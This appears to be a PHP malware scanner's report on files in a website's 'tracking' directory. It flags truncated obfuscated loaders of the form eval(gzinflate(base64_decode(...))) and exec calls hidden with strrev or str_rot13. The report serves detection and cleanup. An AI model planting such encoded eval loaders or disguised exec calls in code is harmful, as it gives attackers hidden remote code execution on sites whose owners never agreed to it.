<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09a3fbNrKft+f0PyCMN5JaS/Ijr8qWU9dx29yT142d3dvNzdWhRMhiQpFakvKjqf/7ncGDBEmQAiU7TbNST2OJBAaDwWAwM5gBvv2m233mu7Fru7+7/hmJJ5RENIrcwP/2G/FlEMV2GDdbe99+8y0Uf0rHri/L+vaUkmBMZvYZ/fabDfxD+sSyncF54I7oYBgGtjOyo9gStZ/5I2/uYHWfjgC+HV6RsevR6NtvQvrvuRvSQeCPaLPhsoK0O49drzObzBrYvr7Ia/vM9e0YUNUWJEnB+ML13GAwobZDQ1aWYeWOmz9ueCNvf6f16dtvCHx4iab1PBgxuD3i+g69xCoWgscy9NKN4et1vl9IFs8dhtizw3kckKeu7dGQ2L5D/oFEIT9Jouh6nmILRLSh/sBh9QesbBcg4wv4MxjP/VGU9kIOpJeO5NOfSDD8QEcxDI0...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/set.php

Size: 2.92 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 3
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEALVZe0/byBb/GyS+w2BFa6eFOLC9K126VGohu0XtFm6glSrKWhN74szGr51xCtE23/2eeTnjxE6gq6Kq2DO/8545D7O3u7c7ITgizHPe3txc+Ue9Pjru99HlO6f7crl3lmclycrDm3lBThAuioSGuKR55v/F80xCff9sQsIpGucMhXk2pnGvt7dLx97+mCYkIA+Ul9xzaBYms4j4GlJMCqfb3dv9Z28XwU9Eief8Onp1MyGMIMoRzhBhLGc9dCYJkGCGsrwEObMs6v3qj15J8Ys9MIUTzkGpgJeYlZ5YZuTvGWUkyLOQeK4RPitpIkS77ZBrwr7SkHB/mlbITjRCpygj9+j8jeQu7UOdYDj438fB9c2tO3bv0OkpcqZk7qAuGLWzAigA8NNP9gqFFYlcaCNaWHLczLGi3+nw4iICBWcsiUiYR8Srw4TGAqWcdI5LDGDMGJ5761tAkc04EcLRUcNugiGchGQSUNKUGB7...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEALVZe0/byBb/GyS+w2BFa6eFOLC9K126VGohu0XtFm6glSrKWhN74szGr51xCtE23/2eeTnjxE6gq6Kq2DO/8545D7O3u7c7ITgizHPe3txc+Ue9Pjru99HlO6f7crl3lmclycrDm3lBThAuioSGuKR55v/F80xCff9sQsIpGucMhXk2pnGvt7dLx97+mCYkIA+Ul9xzaBYms4j4GlJMCqfb3dv9Z28XwU9Eief8Onp1MyGMIMoRzhBhLGc9dCYJkGCGsrwEObMs6v3qj15J8Ys9MIUTzkGpgJeYlZ5YZuTvGWUkyLOQeK4RPitpIkS77ZBrwr7SkHB/mlbITjRCpygj9+j8jeQu7UOdYDj438fB9c2tO3bv0OkpcqZk7qAuGLWzAigA8NNP9gqFFYlcaCNaWHLczLGi3+nw4iICBWcsiUiYR8Srw4TGAqWcdI5LDGD...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEALVZe0/byBb/GyS+w2BFa6eFOLC9K126VGohu0XtFm6glSrKWhN74szGr51xCtE23/2eeTnjxE6gq6Kq2DO/8545D7O3u7c7ITgizHPe3txc+Ue9Pjru99HlO6f7crl3lmclycrDm3lBThAuioSGuKR55v/F80xCff9sQsIpGucMhXk2pnGvt7dLx97+mCYkIA+Ul9xzaBYms4j4GlJMCqfb3dv9Z28XwU9Eief8Onp1MyGMIMoRzhBhLGc9dCYJkGCGsrwEObMs6v3qj15J8Ys9MIUTzkGpgJeYlZ5YZuTvGWUkyLOQeK4RPitpIkS77ZBrwr7SkHB/mlbITjRCpygj9+j8jeQu7UOdYDj438fB9c2tO3bv0OkpcqZk7qAuGLWzAigA8NNP9gqFFYlcaCNaWHLczLGi3+nw4iICBWcsiUiYR8Srw4TGAqWcdI5LDGD...

Function strrev exec_strrev Line: 3 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

<?php cExE

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ad_vb_logs.php

Size: 6.08 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO08a3PbyJGf11X+D2MszyBtiZQ2dbmEIumVJTnRldfrs+RNcvYWaggMybFADDMY6LEb//d0z+D9Ikhv6pLb4IMtDrp7unv6NY0BHj8ajS4DrjjlP/FgSdSKkZCFIRfB40fxH06oqFT9wcnjR48B/JwteJDABnTNiFiQDV2yx496+B+ZEot6zq3gLnPmUlDPpaGyYuzLwPUjD9ED5gJ9Kh/IgvssfPxIsr9GXDJHBC7r21wDslGkuD/crDY2zl8P8pYueUAVsFoLSFJAdcd9LpwVox6TGlZzxRf9b3u+60++Gfz8+BGBy0D0rdfC1XTHhAceu0cUC8kjDLvnCv78XJYL1eLzuUTJTiMlyDmnPpOEBh75AZVCXiZKqZM84xaUSAHf8TS+o2FHQBlvwH/OIgrcMJMiWUg/W8nzl0TMPzFXwdJ4c1iYgN3BYLqUBQQBGJIsfTGnPrmlktM5TAh0qCJUMhIz6Q0fP/qDAeq...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO08a3PbyJGf11X+D2MszyBtiZQ2dbmEIumVJTnRldfrs+RNcvYWaggMybFADDMY6LEb//d0z+D9Ikhv6pLb4IMtDrp7unv6NY0BHj8ajS4DrjjlP/FgSdSKkZCFIRfB40fxH06oqFT9wcnjR48B/JwteJDABnTNiFiQDV2yx496+B+ZEot6zq3gLnPmUlDPpaGyYuzLwPUjD9ED5gJ9Kh/IgvssfPxIsr9GXDJHBC7r21wDslGkuD/crDY2zl8P8pYueUAVsFoLSFJAdcd9LpwVox6TGlZzxRf9b3u+60++Gfz8+BGBy0D0rdfC1XTHhAceu0cUC8kjDLvnCv78XJYL1eLzuUTJTiMlyDmnPpOEBh75AZVCXiZKqZM84xaUSAHf8TS+o2FHQBlvwH/OIgrcMJMiWUg/W8nzl0TMPzFXwdJ4c1iYgN3BYLqUBQQBGJI...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO08a3PbyJGf11X+D2MszyBtiZQ2dbmEIumVJTnRldfrs+RNcvYWaggMybFADDMY6LEb//d0z+D9Ikhv6pLb4IMtDrp7unv6NY0BHj8ajS4DrjjlP/FgSdSKkZCFIRfB40fxH06oqFT9wcnjR48B/JwteJDABnTNiFiQDV2yx496+B+ZEot6zq3gLnPmUlDPpaGyYuzLwPUjD9ED5gJ9Kh/IgvssfPxIsr9GXDJHBC7r21wDslGkuD/crDY2zl8P8pYueUAVsFoLSFJAdcd9LpwVox6TGlZzxRf9b3u+60++Gfz8+BGBy0D0rdfC1XTHhAceu0cUC8kjDLvnCv78XJYL1eLzuUTJTiMlyDmnPpOEBh75AZVCXiZKqZM84xaUSAHf8TS+o2FHQBlvwH/OIgrcMJMiWUg/W8nzl0TMPzFXwdJ4c1iYgN3BYLqUBQQBGJI...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/manage_companies.php

Size: 10.55 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO09a3fbtpKfb87Jf0AY31LeWpLtJE1qS0od2229zWtj597tcb06FAlLrClSJaHYuW3++84AIAlSfEt2k1bswyIJDAaDwcxggBnev9ftHk6oeUUuPZ+Ynntpjzud+/fsy9aDS9uhQ3pjByxoabZrOnOLdmWR2WSmbW7ev/f7/XsELsumLa03GpxNqE+JHRDDJdT3Pb9DDnkFgsCI6zFoZ+5aHfLWoUZAiU/bthsww3GIaJ8ZJiPBfDbzfNbpdUcDbXP//r1P9+8FNAhszx1CYZ+18KFPf5vbPh16rklbeojgnNkOoqdjkY2ZMaakTzTDmtou3mj41BrBM5dek6MXHBLv78bw9Pj09OTN63N9Rv2pzZvTL0i/T7bjnm6Y3nRmuB+HJvSDARgA1h6MKTsUzw/x8fee/z6gvgpyDvdD29IvsD0FkE0DBciB4xyGj8uAfKJOQOtg1arcdEvSHP/pdt/CIDmeYRHOKIFgDiA...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09a3fbtpKfb87Jf0AY31LeWpLtJE1qS0od2229zWtj597tcb06FAlLrClSJaHYuW3++84AIAlSfEt2k1bswyIJDAaDwcxggBnev9ftHk6oeUUuPZ+Ynntpjzud+/fsy9aDS9uhQ3pjByxoabZrOnOLdmWR2WSmbW7ev/f7/XsELsumLa03GpxNqE+JHRDDJdT3Pb9DDnkFgsCI6zFoZ+5aHfLWoUZAiU/bthsww3GIaJ8ZJiPBfDbzfNbpdUcDbXP//r1P9+8FNAhszx1CYZ+18KFPf5vbPh16rklbeojgnNkOoqdjkY2ZMaakTzTDmtou3mj41BrBM5dek6MXHBLv78bw9Pj09OTN63N9Rv2pzZvTL0i/T7bjnm6Y3nRmuB+HJvSDARgA1h6MKTsUzw/x8fee/z6gvgpyDvdD29IvsD0FkE0DBciB4xyGj8uAfKJ...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09a3fbtpKfb87Jf0AY31LeWpLtJE1qS0od2229zWtj597tcb06FAlLrClSJaHYuW3++84AIAlSfEt2k1bswyIJDAaDwcxggBnev9ftHk6oeUUuPZ+Ynntpjzud+/fsy9aDS9uhQ3pjByxoabZrOnOLdmWR2WSmbW7ev/f7/XsELsumLa03GpxNqE+JHRDDJdT3Pb9DDnkFgsCI6zFoZ+5aHfLWoUZAiU/bthsww3GIaJ8ZJiPBfDbzfNbpdUcDbXP//r1P9+8FNAhszx1CYZ+18KFPf5vbPh16rklbeojgnNkOoqdjkY2ZMaakTzTDmtou3mj41BrBM5dek6MXHBLv78bw9Pj09OTN63N9Rv2pzZvTL0i/T7bjnm6Y3nRmuB+HJvSDARgA1h6MKTsUzw/x8fee/z6gvgpyDvdD29IvsD0FkE0DBciB4xyGj8uAfKJ...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ad_vb_sequence_edit.php

Size: 13.52 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO09a3fbNrKft+f0PyCMt5RbPey4abqyrdSxldb3xHFubG/vbjZXS4mQxIYidUnKj6b573cGDxIkQYqUlbTZSjmt+RgMBoPBYGaAAb/8otM59ZzIsZxfHW9CoiklIQ1Dx/e+/EJcDMLICqLG9v6XX3wJ4Cd07HgS1rNmlPhjMrcm9MsvtvAPOSSGZQ+ufWdEB8PAt+yRFUaGKH3qjdyFjcU9OgL8VnBHxo5Lwy+/COj/LZyADnxvRBumwwBpZxE5bns+nZtYvx7klTVxPCsCUrWAJAaMbhzX8QdTatk0YLCMKmfc+GHLHbkHj7bff/kFgR+HaBgv/BHD2yWOZ9NbLGIgeoSht04Elx+y7UK2uM4wwJYdLSKfnDiWSwNieTb5OzKFPJNM0bU8oRaYaEH5gc3KDxhsBzDjC/gzGC+8UZi0Qnakm/TkyTPiD3+howi6xh5Cx3j0Bh7GXZkq4EOJgExcf2i55NoKHGsIFQI...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09a3fbNrKft+f0PyCMt5RbPey4abqyrdSxldb3xHFubG/vbjZXS4mQxIYidUnKj6b573cGDxIkQYqUlbTZSjmt+RgMBoPBYGaAAb/8otM59ZzIsZxfHW9CoiklIQ1Dx/e+/EJcDMLICqLG9v6XX3wJ4Cd07HgS1rNmlPhjMrcm9MsvtvAPOSSGZQ+ufWdEB8PAt+yRFUaGKH3qjdyFjcU9OgL8VnBHxo5Lwy+/COj/LZyADnxvRBumwwBpZxE5bns+nZtYvx7klTVxPCsCUrWAJAaMbhzX8QdTatk0YLCMKmfc+GHLHbkHj7bff/kFgR+HaBgv/BHD2yWOZ9NbLGIgeoSht04Elx+y7UK2uM4wwJYdLSKfnDiWSwNieTb5OzKFPJNM0bU8oRaYaEH5gc3KDxhsBzDjC/gzGC+8UZi0Qnakm/TkyTPiD3+howi6xh5...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09a3fbNrKft+f0PyCMt5RbPey4abqyrdSxldb3xHFubG/vbjZXS4mQxIYidUnKj6b573cGDxIkQYqUlbTZSjmt+RgMBoPBYGaAAb/8otM59ZzIsZxfHW9CoiklIQ1Dx/e+/EJcDMLICqLG9v6XX3wJ4Cd07HgS1rNmlPhjMrcm9MsvtvAPOSSGZQ+ufWdEB8PAt+yRFUaGKH3qjdyFjcU9OgL8VnBHxo5Lwy+/COj/LZyADnxvRBumwwBpZxE5bns+nZtYvx7klTVxPCsCUrWAJAaMbhzX8QdTatk0YLCMKmfc+GHLHbkHj7bff/kFgR+HaBgv/BHD2yWOZ9NbLGIgeoSht04Elx+y7UK2uM4wwJYdLSKfnDiWSwNieTb5OzKFPJNM0bU8oRaYaEH5gc3KDxhsBzDjC/gzGC+8UZi0Qnakm/TkyTPiD3+howi6xh5...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/manage_email.php

Size: 5.92 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAOUcaXcbt/Fz/Z7+A7RWQ7IWD0m261AkE0VmbOVJlhoySVNFTwV3QRHWXt3F6kiq/94ZYO+LKyXOa9NNnHgXg8FcGMwAA2486/cPV0y/JkvHI7pjL/lVr7fxjC/bm0tuskt2x33htzVu62ZgsH4I4q5crdPZePbLxjMCj8FZWxstJvMV8xjhPqE2YZ7neD1yKDsQREZsR8A4gW30yJnJqM+Ix7rc9gU1TaLGF1QXxA9c1/FEb9RfTLTO/sazh41nPvN97tiXAOyJNn702L8C7rFLx9ZZuxURGAhuInmtahDdpL7fYxblpmCWa1LB/LjLlkuvGBkTjRoWt/FFg68bIKczINZ0qEGkwHwlJO77TLS3LmfT2ezo9MN5K/CZd8mN1kVKPCtGDea1tWNHpwKYGBLTueK2kuK+ggFBC8UpoE3hc5lnccl662K00yEhyi8mG89Gvu5xVxBx77KxJtid6H+kN1R91SYKkJoM5NX...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOUcaXcbt/Fz/Z7+A7RWQ7IWD0m261AkE0VmbOVJlhoySVNFTwV3QRHWXt3F6kiq/94ZYO+LKyXOa9NNnHgXg8FcGMwAA2486/cPV0y/JkvHI7pjL/lVr7fxjC/bm0tuskt2x33htzVu62ZgsH4I4q5crdPZePbLxjMCj8FZWxstJvMV8xjhPqE2YZ7neD1yKDsQREZsR8A4gW30yJnJqM+Ix7rc9gU1TaLGF1QXxA9c1/FEb9RfTLTO/sazh41nPvN97tiXAOyJNn702L8C7rFLx9ZZuxURGAhuInmtahDdpL7fYxblpmCWa1LB/LjLlkuvGBkTjRoWt/FFg68bIKczINZ0qEGkwHwlJO77TLS3LmfT2ezo9MN5K/CZd8mN1kVKPCtGDea1tWNHpwKYGBLTueK2kuK+ggFBC8UpoE3hc5lnccl662K00yEhyi8mG89...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOUcaXcbt/Fz/Z7+A7RWQ7IWD0m261AkE0VmbOVJlhoySVNFTwV3QRHWXt3F6kiq/94ZYO+LKyXOa9NNnHgXg8FcGMwAA2486/cPV0y/JkvHI7pjL/lVr7fxjC/bm0tuskt2x33htzVu62ZgsH4I4q5crdPZePbLxjMCj8FZWxstJvMV8xjhPqE2YZ7neD1yKDsQREZsR8A4gW30yJnJqM+Ix7rc9gU1TaLGF1QXxA9c1/FEb9RfTLTO/sazh41nPvN97tiXAOyJNn702L8C7rFLx9ZZuxURGAhuInmtahDdpL7fYxblpmCWa1LB/LjLlkuvGBkTjRoWt/FFg68bIKczINZ0qEGkwHwlJO77TLS3LmfT2ezo9MN5K/CZd8mN1kVKPCtGDea1tWNHpwKYGBLTueK2kuK+ggFBC8UpoE3hc5lnccl662K00yEhyi8mG89...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ad_vb_sequences_edit.php

Size: 3.94 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAM0aa3PbNvJzPeP/sGF9kZyxJKc3k7vq5Tq20nomiVNLuV5fw4FISEJDESwBWlZT//fbBQmKkklJ6bmd4gtJYHexL+wuAB4etFpXodCCid9EOAU946C4UkKGhwfZi6s0i3X9uHN4cIjgl3wiQgsbsjkHOYGITfnhwRE9oAcO891bKTzujmPJfI8p7WTYV6EXJD6hh9xD+ixewkQEXB0exPzXRMTclaHH6zVhAHkr0SJoRrOoRvOXg7xjUxEyjayWAkIOqBciENKdcebz2MAarsSk/tVR4AXdL44/Hh4AthSi7ryWnqHbBhH6/I5QHCJPMPxOaHy935SL1BKIcUySnSdawqVgAY+BhT78h5QCL61SyiRfcYtKZIjv+gbfNbAtpEwD+HAnSeiplRTWkMHKkpcvQY5/4Z5G0/hjNEzIF9iZm3INQSJGDNNAjlkAtywWbIwTIh2mgcUcMib95uHB1ynQ0bnnySTUQ+Gf4Ee...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAM0aa3PbNvJzPeP/sGF9kZyxJKc3k7vq5Tq20nomiVNLuV5fw4FISEJDESwBWlZT//fbBQmKkklJ6bmd4gtJYHexL+wuAB4etFpXodCCid9EOAU946C4UkKGhwfZi6s0i3X9uHN4cIjgl3wiQgsbsjkHOYGITfnhwRE9oAcO891bKTzujmPJfI8p7WTYV6EXJD6hh9xD+ixewkQEXB0exPzXRMTclaHH6zVhAHkr0SJoRrOoRvOXg7xjUxEyjayWAkIOqBciENKdcebz2MAarsSk/tVR4AXdL44/Hh4AthSi7ryWnqHbBhH6/I5QHCJPMPxOaHy935SL1BKIcUySnSdawqVgAY+BhT78h5QCL61SyiRfcYtKZIjv+gbfNbAtpEwD+HAnSeiplRTWkMHKkpcvQY5/4Z5G0/hjNEzIF9iZm3INQSJGDNNAjlkAtywWbIw...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAM0aa3PbNvJzPeP/sGF9kZyxJKc3k7vq5Tq20nomiVNLuV5fw4FISEJDESwBWlZT//fbBQmKkklJ6bmd4gtJYHexL+wuAB4etFpXodCCid9EOAU946C4UkKGhwfZi6s0i3X9uHN4cIjgl3wiQgsbsjkHOYGITfnhwRE9oAcO891bKTzujmPJfI8p7WTYV6EXJD6hh9xD+ixewkQEXB0exPzXRMTclaHH6zVhAHkr0SJoRrOoRvOXg7xjUxEyjayWAkIOqBciENKdcebz2MAarsSk/tVR4AXdL44/Hh4AthSi7ryWnqHbBhH6/I5QHCJPMPxOaHy935SL1BKIcUySnSdawqVgAY+BhT78h5QCL61SyiRfcYtKZIjv+gbfNbAtpEwD+HAnSeiplRTWkMHKkpcvQY5/4Z5G0/hjNEzIF9iZm3INQSJGDNNAjlkAtywWbIw...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/setup_phone_numbers.php

Size: 11.44 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO09/XPbtpI/X2f6PyCMr5Ri68uJk1S2lKqO0vrGjnOW075OXkZDiZDEhiJ1JGXHTfO/3y4AUiAJkJSdvNfeGW9eY5HAYrEAFvuF5bfftFrHCzr9QGZ+QKa+N3Pmzea33ziz2oOZ49Ix/eiEUVgzHG/qrm3aElVWi5VRr3/7zadvvyFQbIfWjKNJ/3JBA0qckFgeoUHgB01yzBoQBEY8P4J+1p7dJG9caoWUBLTheGFkuS7h/UfWNCLherXyg6h51Jr0jfrht998/vabkIah43tjqBxENXwY0P9ZOwEd+96U1swYwXXkuIieiVV27AnpEY9ek5c/sjat1uUC0OMYWvbS8Rq+596QlTWnTXz9BjByfcsmjCohp4QThjSq7YxHw9Ho5Pz1O3Md0mDs2OZ7iQYLatk0qBmn/tSKANMucf2543FSHfI6QM2ID4cB/kECuaLB0mFDNN8fdch335EH8tuALkPzPfyxDqYLoNz...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09/XPbtpI/X2f6PyCMr5Ri68uJk1S2lKqO0vrGjnOW075OXkZDiZDEhiJ1JGXHTfO/3y4AUiAJkJSdvNfeGW9eY5HAYrEAFvuF5bfftFrHCzr9QGZ+QKa+N3Pmzea33ziz2oOZ49Ix/eiEUVgzHG/qrm3aElVWi5VRr3/7zadvvyFQbIfWjKNJ/3JBA0qckFgeoUHgB01yzBoQBEY8P4J+1p7dJG9caoWUBLTheGFkuS7h/UfWNCLherXyg6h51Jr0jfrht998/vabkIah43tjqBxENXwY0P9ZOwEd+96U1swYwXXkuIieiVV27AnpEY9ek5c/sjat1uUC0OMYWvbS8Rq+596QlTWnTXz9BjByfcsmjCohp4QThjSq7YxHw9Ho5Pz1O3Md0mDs2OZ7iQYLatk0qBmn/tSKANMucf2543FSHfI6QM2ID4cB/kECuaL...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09/XPbtpI/X2f6PyCMr5Ri68uJk1S2lKqO0vrGjnOW075OXkZDiZDEhiJ1JGXHTfO/3y4AUiAJkJSdvNfeGW9eY5HAYrEAFvuF5bfftFrHCzr9QGZ+QKa+N3Pmzea33ziz2oOZ49Ix/eiEUVgzHG/qrm3aElVWi5VRr3/7zadvvyFQbIfWjKNJ/3JBA0qckFgeoUHgB01yzBoQBEY8P4J+1p7dJG9caoWUBLTheGFkuS7h/UfWNCLherXyg6h51Jr0jfrht998/vabkIah43tjqBxENXwY0P9ZOwEd+96U1swYwXXkuIieiVV27AnpEY9ek5c/sjat1uUC0OMYWvbS8Rq+596QlTWnTXz9BjByfcsmjCohp4QThjSq7YxHw9Ho5Pz1O3Md0mDs2OZ7iQYLatk0qBmn/tSKANMucf2543FSHfI6QM2ID4cB/kECuaL...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/admin_ajax_handle.php

Size: 20.48 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 3
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO19bXfbuLHwZ+85+x8QXp9K2tCWnW63T53IWcVWEreO5WvJ2e7N5nBpibbZSKQqUnF8t/nvzwzeCIAARclONr2Nuo0lADMABoOZwQAYfPtNFmVZnCZBlofzvNl6/O038+ifi3geBWkyipqNOBlNFuOovcjjyfbsetbAIvFVkkKJRRbNg/Ai5YCQftl8EGdZlDc3g0FvMDjqn7xp0FLxuPG21fr2m9++/YbA5zoKx9G86R2nozCH6vdInIyjD1iBh6iwTPQhzuHrR0TcbpPDo0H32XGPHHQPXva+/UZgOAhH19HWQZrk83SyR5J0a4QpPpkusnxrHr0PJ/E4zCNASwDLy+HwtL27vVsg6H2YQW+zPTIIc588+oH8dTEhu3/5y5/Jzp/2dnbgP/Li1ZCDHwImaCrJryMyC7Oct+35IhlhN8gwvJhE336zSWsNLnlyRjoknM/D2ybrWWPw82DYexV0Dw+Dg/6r0+7Jzw1...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19bXfbuLHwZ+85+x8QXp9K2tCWnW63T53IWcVWEreO5WvJ2e7N5nBpibbZSKQqUnF8t/nvzwzeCIAARclONr2Nuo0lADMABoOZwQAYfPtNFmVZnCZBlofzvNl6/O038+ifi3geBWkyipqNOBlNFuOovcjjyfbsetbAIvFVkkKJRRbNg/Ai5YCQftl8EGdZlDc3g0FvMDjqn7xp0FLxuPG21fr2m9++/YbA5zoKx9G86R2nozCH6vdInIyjD1iBh6iwTPQhzuHrR0TcbpPDo0H32XGPHHQPXva+/UZgOAhH19HWQZrk83SyR5J0a4QpPpkusnxrHr0PJ/E4zCNASwDLy+HwtL27vVsg6H2YQW+zPTIIc588+oH8dTEhu3/5y5/Jzp/2dnbgP/Li1ZCDHwImaCrJryMyC7Oct+35IhlhN8gwvJhE336zSWsNLnlyRjo...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19bXfbuLHwZ+85+x8QXp9K2tCWnW63T53IWcVWEreO5WvJ2e7N5nBpibbZSKQqUnF8t/nvzwzeCIAARclONr2Nuo0lADMABoOZwQAYfPtNFmVZnCZBlofzvNl6/O038+ifi3geBWkyipqNOBlNFuOovcjjyfbsetbAIvFVkkKJRRbNg/Ai5YCQftl8EGdZlDc3g0FvMDjqn7xp0FLxuPG21fr2m9++/YbA5zoKx9G86R2nozCH6vdInIyjD1iBh6iwTPQhzuHrR0TcbpPDo0H32XGPHHQPXva+/UZgOAhH19HWQZrk83SyR5J0a4QpPpkusnxrHr0PJ/E4zCNASwDLy+HwtL27vVsg6H2YQW+zPTIIc588+oH8dTEhu3/5y5/Jzp/2dnbgP/Li1ZCDHwImaCrJryMyC7Oct+35IhlhN8gwvJhE336zSWsNLnlyRjo...

Function str_rot13 exec_str_rot13 Line: 3 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

<?php rKRp

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/test_voice.php

Size: 0.98 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

